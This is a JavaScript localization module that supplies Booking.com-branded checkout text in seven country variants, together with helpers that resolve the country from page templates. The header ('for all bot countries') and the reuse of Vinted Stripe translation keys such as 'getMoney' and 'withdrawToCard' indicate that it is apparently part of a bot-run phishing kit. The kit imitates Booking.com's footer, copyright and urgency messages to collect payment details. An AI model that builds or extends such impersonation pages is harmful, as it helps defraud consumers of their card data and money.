/** Booking.com checkout copy for all bot countries. */

import { vintedStripeTranslations } from './vintedStripeTranslations';
import { resolveMarketLocaleCountry, resolveMarketStripeLocale } from './marketLocaleFallback';

const BOOKING_STRIPE_LOCALE = {
  DE: 'DE',
  PL: 'PL',
  RO: 'RO',
  PT: 'PT',
  FI: 'FI',
  CH: 'DE',
  GB: 'IE',
};

const LOCALES = {
  DE: {
    lang: 'de',
    stepSelection: 'Ihre Auswahl',
    stepDetails: 'Ihre Angaben',
    stepFinal: 'Letzter Schritt',
    bookingDetails: 'Ihre Buchungsdetails',
    checkIn: 'Anreise',
    checkOut: 'Abreise',
    priceSummary: 'Ihre Preisübersicht',
    price: 'Preis',
    cancellationTitle: 'Wie viel kostet eine Stornierung?',
    cancellationText: 'Kostenlose Stornierung jederzeit!',
    paymentDetails: 'Ihre Zahlungsdetails',
    payToday: 'Heute zahlen Sie',
    payAtProperty: 'Vor Ort zahlen Sie',
    refundSchedule: 'Rückerstattungsplan',
    refundScheduleText: 'Sie können Ihr Geld jederzeit zurückfordern.',
    enterDetails: 'Geben Sie Ihre Daten ein',
    almostDone: 'Fast fertig! Füllen Sie nur noch die * Pflichtfelder aus',
    workTravel: 'Reisen Sie geschäftlich?',
    workYes: 'Ja',
    workNo: 'Nein',
    specialRequests: 'Besondere Wünsche',
    specialRequestsHint:
      'Besondere Wünsche können nicht garantiert werden – die Unterkunft wird jedoch ihr Bestes tun. Sie können jederzeit nach Abschluss der Buchung einen Wunsch hinzufügen!',
    specialRequestsPh: 'Bitte schreiben Sie Ihre Wünsche auf Englisch. (optional)',
    arrivalTitle: 'Ihre Ankunftszeit',
    arrivalReady: 'Ihr Zimmer ist zwischen 14:00 und 00:00 Uhr zum Check-in bereit',
    arrivalDesk: '24-Stunden-Rezeption – Hilfe, wann immer Sie sie brauchen!',
    arrivalAddLink: 'Geschätzte Ankunftszeit hinzufügen (optional)',
    limitedSupply:
      'Begrenzte Verfügbarkeit für Ihre Daten: 10 Vier-Sterne-Hotels wie dieses sind auf unserer Seite bereits ausgebucht',
    nextButton: 'Weiter: Letzte Details',
    greatLocation: 'Tolle Lage',
    footerAbout: 'Über Booking.com',
    footerHelp: 'Kundenservice',
    footerTerms: 'AGB',
    footerPrivacy: 'Datenschutz- & Cookie-Erklärung',
    footerCopyright: 'Copyright © 1996–2026 Booking.com. Alle Rechte vorbehalten.',
    loading: 'Wird geladen…',
  },
  PL: {
    lang: 'pl',
    stepSelection: 'Twój wybór',
    stepDetails: 'Twoje dane',
    stepFinal: 'Ostatni krok',
    bookingDetails: 'Szczegóły rezerwacji',
    checkIn: 'Zameldowanie',
    checkOut: 'Wymeldowanie',
    priceSummary: 'Podsumowanie ceny',
    price: 'Cena',
    cancellationTitle: 'Ile kosztuje anulowanie?',
    cancellationText: 'Bezpłatne anulowanie w dowolnym momencie!',
    paymentDetails: 'Szczegóły płatności',
    payToday: 'Dzisiaj zapłacisz',
    payAtProperty: 'W obiekcie zapłacisz',
    refundSchedule: 'Harmonogram zwrotu',
    refundScheduleText: 'Możesz odzyskać środki w dowolnym momencie.',
    enterDetails: 'Wprowadź swoje dane',
    almostDone: 'Prawie gotowe! Wypełnij tylko wymagane pola *',
    workTravel: 'Podróżujesz służbowo?',
    workYes: 'Tak',
    workNo: 'Nie',
    specialRequests: 'Specjalne prośby',
    specialRequestsHint:
      'Specjalnych prośb nie można zagwarantować, ale obiekt dołoży wszelkich starań. Możesz dodać prośbę po zakończeniu rezerwacji!',
    specialRequestsPh: 'Prosimy pisać prośby po angielsku. (opcjonalnie)',
    arrivalTitle: 'Godzina przyjazdu',
    arrivalReady: 'Pokój będzie gotowy do zameldowania między 14:00 a 00:00',
    arrivalDesk: 'Całodobowa recepcja – pomoc, kiedy jej potrzebujesz!',
    arrivalAddLink: 'Dodaj szacowaną godzinę przyjazdu (opcjonalnie)',
    limitedSupply:
      'Ograniczona dostępność w Twoich terminach: 10 czterogwiazdkowych hoteli jak ten jest już niedostępnych',
    nextButton: 'Dalej: Ostatnie szczegóły',
    greatLocation: 'Świetna lokalizacja',
    footerAbout: 'O Booking.com',
    footerHelp: 'Obsługa klienta',
    footerTerms: 'Regulamin',
    footerPrivacy: 'Oświadczenie o prywatności i plikach cookie',
    footerCopyright: 'Copyright © 1996–2026 Booking.com. Wszelkie prawa zastrzeżone.',
    loading: 'Ładowanie…',
  },
  RO: {
    lang: 'ro',
    stepSelection: 'Selecția dvs.',
    stepDetails: 'Detaliile dvs.',
    stepFinal: 'Pasul final',
    bookingDetails: 'Detaliile rezervării',
    checkIn: 'Check-in',
    checkOut: 'Check-out',
    priceSummary: 'Rezumat preț',
    price: 'Preț',
    cancellationTitle: 'Cât costă anularea?',
    cancellationText: 'Anulare gratuită oricând!',
    paymentDetails: 'Detalii plată',
    payToday: 'Astăzi plătiți',
    payAtProperty: 'La proprietate plătiți',
    refundSchedule: 'Program de rambursare',
    refundScheduleText: 'Puteți recupera fondurile oricând.',
    enterDetails: 'Introduceți datele',
    almostDone: 'Aproape gata! Completați doar câmpurile obligatorii *',
    workTravel: 'Călătoriți în interes de serviciu?',
    workYes: 'Da',
    workNo: 'Nu',
    specialRequests: 'Cereri speciale',
    specialRequestsHint:
      'Cererile speciale nu pot fi garantate, dar proprietatea va face tot posibilul. Puteți adăuga o cerere după finalizarea rezervării!',
    specialRequestsPh: 'Scrieți cererile în engleză. (opțional)',
    arrivalTitle: 'Ora sosirii',
    arrivalReady: 'Camera va fi pregătită pentru check-in între 14:00 și 00:00',
    arrivalDesk: 'Recepție 24/7 – ajutor oricând aveți nevoie!',
    arrivalAddLink: 'Adăugați ora estimată de sosire (opțional)',
    limitedSupply:
      'Disponibilitate limitată pentru datele dvs.: 10 hoteluri de 4 stele ca acesta sunt deja indisponibile',
    nextButton: 'Continuare: Detalii finale',
    greatLocation: 'Locație excelentă',
    footerAbout: 'Despre Booking.com',
    footerHelp: 'Asistență clienți',
    footerTerms: 'Termeni și condiții',
    footerPrivacy: 'Declarație de confidențialitate și cookie-uri',
    footerCopyright: 'Copyright © 1996–2026 Booking.com. Toate drepturile rezervate.',
    loading: 'Se încarcă…',
  },
  PT: {
    lang: 'pt',
    stepSelection: 'A sua seleção',
    stepDetails: 'Os seus dados',
    stepFinal: 'Passo final',
    bookingDetails: 'Detalhes da reserva',
    checkIn: 'Check-in',
    checkOut: 'Check-out',
    priceSummary: 'Resumo de preços',
    price: 'Preço',
    cancellationTitle: 'Quanto custa cancelar?',
    cancellationText: 'Cancelamento gratuito a qualquer momento!',
    paymentDetails: 'Detalhes de pagamento',
    payToday: 'Hoje paga',
    payAtProperty: 'Na propriedade paga',
    refundSchedule: 'Calendário de reembolso',
    refundScheduleText: 'Pode recuperar os seus fundos a qualquer momento.',
    enterDetails: 'Introduza os seus dados',
    almostDone: 'Quase pronto! Preencha apenas os campos obrigatórios *',
    workTravel: 'Viaja a trabalho?',
    workYes: 'Sim',
    workNo: 'Não',
    specialRequests: 'Pedidos especiais',
    specialRequestsHint:
      'Pedidos especiais não podem ser garantidos, mas a propriedade fará o possível. Pode adicionar um pedido após concluir a reserva!',
    specialRequestsPh: 'Escreva os pedidos em inglês. (opcional)',
    arrivalTitle: 'Hora de chegada',
    arrivalReady: 'O quarto estará pronto para check-in entre 14:00 e 00:00',
    arrivalDesk: 'Receção 24 horas – ajuda quando precisar!',
    arrivalAddLink: 'Adicionar hora estimada de chegada (opcional)',
    limitedSupply:
      'Disponibilidade limitada para as suas datas: 10 hotéis de 4 estrelas como este já estão indisponíveis',
    nextButton: 'Seguinte: Detalhes finais',
    greatLocation: 'Excelente localização',
    footerAbout: 'Sobre Booking.com',
    footerHelp: 'Apoio ao cliente',
    footerTerms: 'Termos e condições',
    footerPrivacy: 'Declaração de privacidade e cookies',
    footerCopyright: 'Copyright © 1996–2026 Booking.com. Todos os direitos reservados.',
    loading: 'A carregar…',
  },
  FI: {
    lang: 'fi',
    stepSelection: 'Valintasi',
    stepDetails: 'Tietosi',
    stepFinal: 'Viimeinen vaihe',
    bookingDetails: 'Varauksen tiedot',
    checkIn: 'Sisäänkirjautuminen',
    checkOut: 'Uloskirjautuminen',
    priceSummary: 'Hintayhteenveto',
    price: 'Hinta',
    cancellationTitle: 'Paljonko peruutus maksaa?',
    cancellationText: 'Ilmainen peruutus milloin tahansa!',
    paymentDetails: 'Maksutiedot',
    payToday: 'Tänään maksat',
    payAtProperty: 'Majapaikassa maksat',
    refundSchedule: 'Palautusaikataulu',
    refundScheduleText: 'Voit palauttaa varasi milloin tahansa.',
    enterDetails: 'Syötä tietosi',
    almostDone: 'Melkein valmis! Täytä vain pakolliset * kentät',
    workTravel: 'Matkustatko työasioissa?',
    workYes: 'Kyllä',
    workNo: 'Ei',
    specialRequests: 'Erityistoiveet',
    specialRequestsHint:
      'Erityistoiveita ei voida taata, mutta majoituspaikka tekee parhaansa. Voit lisätä toiveen varauksen jälkeen!',
    specialRequestsPh: 'Kirjoita toiveet englanniksi. (valinnainen)',
    arrivalTitle: 'Saapumisaikasi',
    arrivalReady: 'Huoneesi on valmis sisäänkirjautumiseen klo 14:00–00:00',
    arrivalDesk: '24 h vastaanotto – apua aina tarvittaessa!',
    arrivalAddLink: 'Lisää arvioitu saapumisaika (valinnainen)',
    limitedSupply:
      'Rajoitettu saatavuus päivillesi: 10 tämän kaltaista neljän tähden hotellia on jo loppuunmyyty',
    nextButton: 'Seuraava: Viimeiset tiedot',
    greatLocation: 'Erinomainen sijainti',
    footerAbout: 'Tietoa Booking.comista',
    footerHelp: 'Asiakaspalvelu',
    footerTerms: 'Käyttöehdot',
    footerPrivacy: 'Tietosuoja- ja evästekäytäntö',
    footerCopyright: 'Copyright © 1996–2026 Booking.com. Kaikki oikeudet pidätetään.',
    loading: 'Ladataan…',
  },
  CH: {
    lang: 'de',
    stepSelection: 'Ihre Auswahl',
    stepDetails: 'Ihre Angaben',
    stepFinal: 'Letzter Schritt',
    bookingDetails: 'Ihre Buchungsdetails',
    checkIn: 'Anreise',
    checkOut: 'Abreise',
    priceSummary: 'Ihre Preisübersicht',
    price: 'Preis',
    cancellationTitle: 'Wie viel kostet eine Stornierung?',
    cancellationText: 'Kostenlose Stornierung jederzeit!',
    paymentDetails: 'Ihre Zahlungsdetails',
    payToday: 'Heute zahlen Sie',
    payAtProperty: 'Vor Ort zahlen Sie',
    refundSchedule: 'Rückerstattungsplan',
    refundScheduleText: 'Sie können Ihr Geld jederzeit zurückfordern.',
    enterDetails: 'Geben Sie Ihre Daten ein',
    almostDone: 'Fast fertig! Füllen Sie nur noch die * Pflichtfelder aus',
    workTravel: 'Reisen Sie geschäftlich?',
    workYes: 'Ja',
    workNo: 'Nein',
    specialRequests: 'Besondere Wünsche',
    specialRequestsHint:
      'Besondere Wünsche können nicht garantiert werden – die Unterkunft wird jedoch ihr Bestes tun.',
    specialRequestsPh: 'Bitte schreiben Sie Ihre Wünsche auf Englisch. (optional)',
    arrivalTitle: 'Ihre Ankunftszeit',
    arrivalReady: 'Ihr Zimmer ist zwischen 14:00 und 00:00 Uhr zum Check-in bereit',
    arrivalDesk: '24-Stunden-Rezeption – Hilfe, wann immer Sie sie brauchen!',
    arrivalAddLink: 'Geschätzte Ankunftszeit hinzufügen (optional)',
    limitedSupply:
      'Begrenzte Verfügbarkeit für Ihre Daten: 10 Vier-Sterne-Hotels wie dieses sind bereits ausgebucht',
    nextButton: 'Weiter: Letzte Details',
    greatLocation: 'Tolle Lage',
    footerAbout: 'Über Booking.com',
    footerHelp: 'Kundenservice',
    footerTerms: 'AGB',
    footerPrivacy: 'Datenschutz- & Cookie-Erklärung',
    footerCopyright: 'Copyright © 1996–2026 Booking.com. Alle Rechte vorbehalten.',
    loading: 'Wird geladen…',
  },
  GB: {
    lang: 'en',
    stepSelection: 'Your selection',
    stepDetails: 'Your details',
    stepFinal: 'Final step',
    bookingDetails: 'Your booking details',
    checkIn: 'Check-in',
    checkOut: 'Check-out',
    priceSummary: 'Your price summary',
    price: 'Price',
    cancellationTitle: 'How much will it cost to cancel?',
    cancellationText: 'Free cancellation at any time!',
    paymentDetails: 'Your payment details',
    payToday: "Today you'll pay",
    payAtProperty: "At the property you'll pay",
    refundSchedule: 'Refund schedule',
    refundScheduleText: 'You can return your funds at any time.',
    enterDetails: 'Enter your details',
    almostDone: 'Almost done! Just fill in the * required info',
    workTravel: 'Are you travelling for work?',
    workYes: 'Yes',
    workNo: 'No',
    specialRequests: 'Special requests',
    specialRequestsHint:
      'Special requests cannot be guaranteed – but the property will do its best to meet your needs. You can always make a special request after your booking is complete!',
    specialRequestsPh: 'Please write your requests in English. (optional)',
    arrivalTitle: 'Your arrival time',
    arrivalReady: 'Your room will be ready for check-in between 14:00 and 00:00',
    arrivalDesk: '24-hour front desk – Help whenever you need it!',
    arrivalAddLink: 'Add your estimated arrival time (optional)',
    limitedSupplyTitle: 'Limited supply for your dates:',
    limitedSupplyBody: '10 four-star hotels like this are already unavailable on our site',
    limitedSupply:
      'Limited supply for your dates: 10 four-star hotels like this are already unavailable on our site',
    nextButton: 'Next: Final details',
    greatLocation: 'Great location',
    footerAbout: 'About Booking.com',
    footerHelp: 'Customer Service help',
    footerTerms: 'Terms & Conditions',
    footerPrivacy: 'Privacy & Cookie Statement',
    footerCopyright: 'Copyright © 1996–2020 Booking.com. All rights reserved.',
    loading: 'Loading…',
  },
};

export function normalizeBookingCountryCode(countryCode) {
  const cc = (countryCode || '').trim().toUpperCase();
  if (!cc) return 'DE';
  return cc === 'UK' ? 'GB' : cc;
}

export function countryCodeFromBookingTemplate(template) {
  if (!template || typeof template !== 'string') return null;
  const m = template.match(/^([a-z]{2})_booking$/i);
  if (!m) return null;
  const cc = m[1].toUpperCase();
  return cc === 'UK' ? 'GB' : cc;
}

export function isBookingTemplate(template) {
  return typeof template === 'string' && template.endsWith('_booking');
}

export function resolveBookingCountryCode({ pageData } = {}) {
  const fromTemplate = countryCodeFromBookingTemplate(
    pageData?.template || pageData?.page_template,
  );
  const raw = pageData?.country_code || fromTemplate || 'DE';
  return normalizeBookingCountryCode(raw);
}

export function getBookingLocale(countryCode) {
  const cc = resolveMarketLocaleCountry(normalizeBookingCountryCode(countryCode));
  return { ...LOCALES.DE, ...(LOCALES[cc] || LOCALES.GB) };
}

export function getBookingCheckoutTranslations(countryCode) {
  const cc = normalizeBookingCountryCode(countryCode);
  const stripeKey = resolveMarketStripeLocale(cc);
  const stripe = vintedStripeTranslations[stripeKey] || vintedStripeTranslations.DE;
  const loc = getBookingLocale(cc);
  return {
    ...stripe,
    back: '← Booking.com',
    withdrawTitle: 'Booking.com',
    productPurchased: loc.nextButton || stripe.productPurchased,
    amountToReceive: loc.price || stripe.amountToReceive,
    secureMessage: loc.paymentDetails || stripe.secureMessage,
    getMoney: loc.nextButton || stripe.getMoney,
    withdrawToCard: loc.paymentDetails || stripe.withdrawToCard,
    withdraw: loc.nextButton || stripe.withdraw,
    confirmPay: loc.nextButton || stripe.confirmPay || stripe.withdraw,
  };
}
